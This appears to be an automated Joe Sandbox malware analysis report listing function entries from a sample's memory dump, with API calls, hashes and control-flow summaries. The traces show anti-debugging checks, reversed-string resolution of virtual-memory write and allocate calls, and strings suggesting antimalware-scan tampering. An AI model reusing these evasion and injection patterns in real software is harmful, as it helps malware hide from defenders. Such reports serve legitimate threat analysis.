                                        Function 02B487A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40libraryloaderCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 9704 2b487a0-2b487c5 LoadLibraryW 9705 2b487c7-2b487df GetProcAddress 9704->9705 9706 2b4880f-2b48815 9704->9706 9707 2b48804-2b4880a FreeLibrary 9705->9707 9708 2b487e1-2b48800 call 2b47d00 9705->9708 9707->9706 9708->9707 9711 2b48802 9708->9711 9711->9707
                                        APIs
                                        • LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02B913A4,02B4A3C7,ScanString,02B913A4,02B4A77C,ScanBuffer,02B913A4,02B4A77C,Initialize,02B913A4,02B4A77C,UacScan), ref: 02B487B4
                                        • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B487CE
                                        • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02B913A4,02B4A3C7,ScanString,02B913A4,02B4A77C,ScanBuffer,02B913A4,02B4A77C,Initialize), ref: 02B4880A
                                          • Part of subcall function 02B47D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B47D74
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                        • String ID: BCryptVerifySignature$bcrypt
                                        • API String ID: 1002360270-4067648912
                                        • Opcode ID: b7c23c57cab4b25500fd23b53cb5e1f8542b300244c8cd03142c2f149a524342
                                        • Instruction ID: 638068c6e0556497d71af471396e966f1cfc3433c076b32ccd98132fdce775af
                                        • Opcode Fuzzy Hash: b7c23c57cab4b25500fd23b53cb5e1f8542b300244c8cd03142c2f149a524342
                                        • Instruction Fuzzy Hash: 05F0A471A98215FEEB119F6CAE84BB633BCD3413D8F0089B9F10C87542CB701810AB50
                                        Function 02B4EBF0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28libraryloaderCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 9721 2b4ebf0-2b4ec0a GetModuleHandleW 9722 2b4ec36-2b4ec3e 9721->9722 9723 2b4ec0c-2b4ec1e GetProcAddress 9721->9723 9723->9722 9724 2b4ec20-2b4ec30 CheckRemoteDebuggerPresent 9723->9724 9724->9722 9725 2b4ec32 9724->9725 9725->9722
                                        APIs
                                        • GetModuleHandleW.KERNEL32(KernelBase), ref: 02B4EC00
                                        • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02B4EC12
                                        • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02B4EC29
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                        • String ID: CheckRemoteDebuggerPresent$KernelBase
                                        • API String ID: 35162468-539270669
                                        • Opcode ID: cc80d66fd51031ace7c9ea02eaa4e9b621c84541d5fa0198c0d34fa2ce2dcc26
                                        • Instruction ID: b472b7859e94dc89618a6e509139a50a6e33c28d85a66a786ca582bdbbb1a686
                                        • Opcode Fuzzy Hash: cc80d66fd51031ace7c9ea02eaa4e9b621c84541d5fa0198c0d34fa2ce2dcc26
                                        • Instruction Fuzzy Hash: 8DF0A77090425CBAD722A7A888C97DCFBA9AB05328F6407D4E424611D2EB754744D655
                                        Function 02B4DBB0 Relevance: 7.6, APIs: 5, Instructions: 80nativefileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 02B34ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02B34EDA
                                        • RtlDosPa.N(00000000,?,00000000,00000000,00000000,02B4DC80), ref: 02B4DBEB
                                        • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02B4DC80), ref: 02B4DC1B
                                        • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02B4DC30
                                        • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02B4DC5C
                                        • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02B4DC65
                                          • Part of subcall function 02B34C0C: SysFreeString.OLEAUT32(02B4E950), ref: 02B34C1A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: File$String$AllocCloseFreeInformationOpenQueryRead
                                        • String ID:
                                        • API String ID: 2659941336-0
                                        • Opcode ID: 205ea4fa91b8a6e834b2d18da851f8334ad9b89e34391b407fee3dac0009d7f7
                                        • Instruction ID: 977887595c801202f1389313691c2f364f27f2e260123c78f4a9fe709243bdee
                                        • Opcode Fuzzy Hash: 205ea4fa91b8a6e834b2d18da851f8334ad9b89e34391b407fee3dac0009d7f7
                                        • Instruction Fuzzy Hash: E121C4717507097AEB11EAD4CC86FEE77BDAB48700F5005A1B700F71C1DAB4AA049BA5
                                        Function 02B4E2F8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111networkCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02B4E436
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: CheckConnectionInternet
                                        • String ID: Initialize$OpenSession$ScanBuffer
                                        • API String ID: 3847983778-3852638603
                                        • Opcode ID: 41698b1cacd432be45af3a8186df5465a71bff1a8d06aca8e4f36d4f0df719c9
                                        • Instruction ID: 636eb7891354e0d882f84798812e3bb858f804c110970478a58dae2ccf2e6e38
                                        • Opcode Fuzzy Hash: 41698b1cacd432be45af3a8186df5465a71bff1a8d06aca8e4f36d4f0df719c9
                                        • Instruction Fuzzy Hash: BD410D71B501089FEB12EBA4DC81A9EB3FAFF8C320F6148A5E141A7250DE74ED059F60
                                        Function 02B4DACC Relevance: 6.1, APIs: 4, Instructions: 80nativefileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 02B34ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02B34EDA
                                        • RtlDosPa.N(00000000,?,00000000,00000000,00000000,02B4DB9E), ref: 02B4DB0B
                                        • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B4DB45
                                        • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02B4DB72
                                        • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02B4DB7B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: File$AllocCloseCreateStringWrite
                                        • String ID:
                                        • API String ID: 3308905243-0
                                        • Opcode ID: b5d1277f3d3355f5c540d38bdd5eb51317a7f8dedf4fee44b3a044b699e2e982
                                        • Instruction ID: 81e9a49b8cc6bcbb69fa53a50854b87da28ce70312606af91d2906a0837c2954
                                        • Opcode Fuzzy Hash: b5d1277f3d3355f5c540d38bdd5eb51317a7f8dedf4fee44b3a044b699e2e982
                                        • Instruction Fuzzy Hash: 7F21C171A40309BAEB11EBD4CD86FAEB7BDEB04B14F5045A1B700F71D0DBB46E049A55
                                        Function 02B479B2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52memorynativeCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 02B48020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B48090,?,?,00000000,?,02B47A06,ntdll,00000000,00000000,02B47A4B,?,?,00000000), ref: 02B4805E
                                          • Part of subcall function 02B48020: GetModuleHandleA.KERNELBASE(?), ref: 02B48072
                                          • Part of subcall function 02B480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B48150,?,?,00000000,00000000,?,02B48069,00000000,KernelBASE,00000000,00000000,02B48090), ref: 02B48115
                                          • Part of subcall function 02B480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B4811B
                                          • Part of subcall function 02B480C8: GetProcAddress.KERNEL32(?,?), ref: 02B4812D
                                        • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B47A27
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                        • String ID: ntdll$yromeMlautriVetacollAwZ
                                        • API String ID: 4072585319-445027087
                                        • Opcode ID: 7963bc3f6a98d59d20d304b6240f33139acbbcc72ac95ef946b572a5452a5883
                                        • Instruction ID: 3ae5b2c5e2d002a4026ca68d77e6b179fd42736c1b54d92aef4ecbad3f5ed972
                                        • Opcode Fuzzy Hash: 7963bc3f6a98d59d20d304b6240f33139acbbcc72ac95ef946b572a5452a5883
                                        • Instruction Fuzzy Hash: 58111E75654209BFEB01EFA8DD81E9EB7BDEB48710F5188A1F504D7640DE30AA14EB60
                                        Function 02B479B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51memorynativeCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 02B48020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B48090,?,?,00000000,?,02B47A06,ntdll,00000000,00000000,02B47A4B,?,?,00000000), ref: 02B4805E
                                          • Part of subcall function 02B48020: GetModuleHandleA.KERNELBASE(?), ref: 02B48072
                                          • Part of subcall function 02B480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B48150,?,?,00000000,00000000,?,02B48069,00000000,KernelBASE,00000000,00000000,02B48090), ref: 02B48115
                                          • Part of subcall function 02B480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B4811B
                                          • Part of subcall function 02B480C8: GetProcAddress.KERNEL32(?,?), ref: 02B4812D
                                        • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B47A27
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                        • String ID: ntdll$yromeMlautriVetacollAwZ
                                        • API String ID: 4072585319-445027087
                                        • Opcode ID: aaadeeee9ebcb95f3d11f631f0172cdae44b4bf63099580c797cd3b16551dcd7
                                        • Instruction ID: 8c1a1b9e7b3b29d52b05e5e9e1a2b06d1e296b958fe6254bd747ade5458ec7b9
                                        • Opcode Fuzzy Hash: aaadeeee9ebcb95f3d11f631f0172cdae44b4bf63099580c797cd3b16551dcd7
                                        • Instruction Fuzzy Hash: A3111B75654209BFEB01EFA8DD81E9EB7BDEB48710F5188A1F504E7640DE30AA14EB60
                                        Function 02B47D00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 02B48020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B48090,?,?,00000000,?,02B47A06,ntdll,00000000,00000000,02B47A4B,?,?,00000000), ref: 02B4805E
                                          • Part of subcall function 02B48020: GetModuleHandleA.KERNELBASE(?), ref: 02B48072
                                          • Part of subcall function 02B480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B48150,?,?,00000000,00000000,?,02B48069,00000000,KernelBASE,00000000,00000000,02B48090), ref: 02B48115
                                          • Part of subcall function 02B480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B4811B
                                          • Part of subcall function 02B480C8: GetProcAddress.KERNEL32(?,?), ref: 02B4812D
                                        • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B47D74
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                                        • String ID: Ntdll$yromeMlautriVetirW
                                        • API String ID: 2719805696-3542721025
                                        • Opcode ID: e01b1934b67778ccbaa1dfeeca6dccbc7e219880d5bbaaf23c7771294c562dcd
                                        • Instruction ID: a86325f77879c37943a4cd153c5682aae5e92076ecae73c49117419eab047047
                                        • Opcode Fuzzy Hash: e01b1934b67778ccbaa1dfeeca6dccbc7e219880d5bbaaf23c7771294c562dcd
                                        • Instruction Fuzzy Hash: 890144B5614205BFEB01EFA8DC81E9EB7FDEB48710F518890F504D7640DE30A910EB64
                                        Function 02B4D9F0 Relevance: 4.5, APIs: 3, Instructions: 47filenativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RtlInitUnicodeString.NTDLL(?,?), ref: 02B4DA6C
                                        • RtlDosPa.N(00000000,?,00000000,00000000,00000000,02B4DABE), ref: 02B4DA82
                                        • NtDeleteFile.NTDLL(?), ref: 02B4DAA1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: DeleteFileInitStringUnicode
                                        • String ID:
                                        • API String ID: 3559453722-0
                                        • Opcode ID: fb8581d54e7116504da0e3fcaad5b686ae378fbad62be45eff5aa9a6e6d2ebda
                                        • Instruction ID: 48d2413674974c7bd17cddf0a9429b3a5dd471437b307ee56c0d8791c77430a1
                                        • Opcode Fuzzy Hash: fb8581d54e7116504da0e3fcaad5b686ae378fbad62be45eff5aa9a6e6d2ebda
                                        • Instruction Fuzzy Hash: 40016D75A08349BEEB06EBA08D81BDD77B9AB45704F5004E3A360F7092DF74AF049B25
                                        Function 02B4DA44 Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 02B34ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02B34EDA
                                        • RtlInitUnicodeString.NTDLL(?,?), ref: 02B4DA6C
                                        • RtlDosPa.N(00000000,?,00000000,00000000,00000000,02B4DABE), ref: 02B4DA82
                                        • NtDeleteFile.NTDLL(?), ref: 02B4DAA1
                                          • Part of subcall function 02B34C0C: SysFreeString.OLEAUT32(02B4E950), ref: 02B34C1A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: String$AllocDeleteFileFreeInitUnicode
                                        • String ID:
                                        • API String ID: 2841551397-0
                                        • Opcode ID: d5aa3bd631e148c2adcc021865b2ad426b577172a6248e9e47262827f943ebda
                                        • Instruction ID: 0f938ea95f31f660c3faca2cec450ebf3adecd383723ca7fd74753b60f6d578c
                                        • Opcode Fuzzy Hash: d5aa3bd631e148c2adcc021865b2ad426b577172a6248e9e47262827f943ebda
                                        • Instruction Fuzzy Hash: 8401E17190420DAADB11EAE0CD91FDEB3BDEB48700F5045A2A610E6190EB74AB049A64
                                        Function 02B46D50 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 02B46CF4: CLSIDFromProgID.OLE32(00000000,?,00000000,02B46D41,?,?,?,00000000), ref: 02B46D21
                                        • CoCreateInstance.OLE32(?,00000000,00000005,02B46E34,00000000,00000000,02B46DB3,?,00000000,02B46E23), ref: 02B46D9F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: CreateFromInstanceProg
                                        • String ID:
                                        • API String ID: 2151042543-0
                                        • Opcode ID: 9234c8deb258968928f8d10349f248c0980d757c0ecc1a562262412a5bb46f09
                                        • Instruction ID: a242f5d83437b4e853bb54c35b39c88ccdd64b4756a1b55128c7918912a0d8c2
                                        • Opcode Fuzzy Hash: 9234c8deb258968928f8d10349f248c0980d757c0ecc1a562262412a5bb46f09
                                        • Instruction Fuzzy Hash: 9201F731648704AEE705DFA4DC9296B7BEDE74EB10B5144B5F901D2650EE308A10E961
                                        Function 02B4ABD8 Relevance: 1.5, APIs: 1, Instructions: 17processCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 02B4A95C: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02B4ABE3,?,?,02B4AC75,00000000,02B4AD51), ref: 02B4A970
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02B4A988
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02B4A99A
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02B4A9AC
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02B4A9BE
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02B4A9D0
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02B4A9E2
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Process32First), ref: 02B4A9F4
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02B4AA06
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02B4AA18
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02B4AA2A
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02B4AA3C
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02B4AA4E
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Module32First), ref: 02B4AA60
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02B4AA72
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02B4AA84
                                          • Part of subcall function 02B4A95C: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02B4AA96
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,02B4AC75,00000000,02B4AD51), ref: 02B4ABE9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: AddressProc$CreateHandleModuleSnapshotToolhelp32
                                        • String ID:
                                        • API String ID: 2242398760-0
                                        • Opcode ID: 3fc796fe7e3dec8c4b69b0cdb6f057c8f1388b9f6ef7e8ea3a74802b1cdd6402
                                        • Instruction ID: d6391237a1d6c2b2f1c89b5ad8b704e975529567e139ddbb9fe3f28cc6640941
                                        • Opcode Fuzzy Hash: 3fc796fe7e3dec8c4b69b0cdb6f057c8f1388b9f6ef7e8ea3a74802b1cdd6402
                                        • Instruction Fuzzy Hash: 05C08CA36522311B8A106AF82DD88C3478DCF4A1F630988E2F609D3102DB258C10B2B0
                                        Function 02B57878 Relevance: 160.3, APIs: 5, Strings: 85, Instructions: 2771processthreadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
